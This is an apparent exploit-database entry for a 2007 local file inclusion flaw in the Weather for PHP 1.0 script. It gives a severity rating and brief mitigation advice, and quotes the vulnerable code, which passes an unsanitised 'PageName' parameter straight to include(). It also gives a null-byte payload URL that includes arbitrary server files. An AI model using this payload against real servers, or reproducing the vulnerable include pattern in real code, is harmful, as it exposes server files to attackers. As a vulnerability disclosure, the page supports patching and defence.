header-logo
Suggest Exploit
vendor:
Weather for PHP
by:
BorN To K!LL
5.5
CVSS
MEDIUM
Local File Include
File Inclusion
CWE
Product Name: Weather for PHP
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Weather for PHP <= (PageName) Local File Include Vulnerability

The vulnerability exists in the Weather for PHP script version 1.0. It allows an attacker to include arbitrary local files by manipulating the 'PageName' parameter in the 'index.php' file. By appending '%00' to the 'PageName' parameter, an attacker can bypass the file extension check and include any local file on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate the 'PageName' parameter to prevent any malicious file inclusion.
Source

Exploit-DB raw data:

Weather for PHP <= (PageName) Local File Include Vulnerability

Script : Weather for PHP

Version : 1.0

Download : http://www.instaguide.com/download/weather_free.zip
 
AUTHOR : BorN To K!LL

Vuln Code :

$PageName = $_GET['PageName'];     //// this is one ... :)

include("includes/content/$PageName.php")   //// this is two ... :)

Exploit :

[path]/index.php?PageName[Local File]%00

Greetings :

str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ...

BorN To K!LL <> Dr.2 = 4ever .... =D

# milw0rm.com [2007-10-22]

Navigation

Suggest Exploit

Services By CQR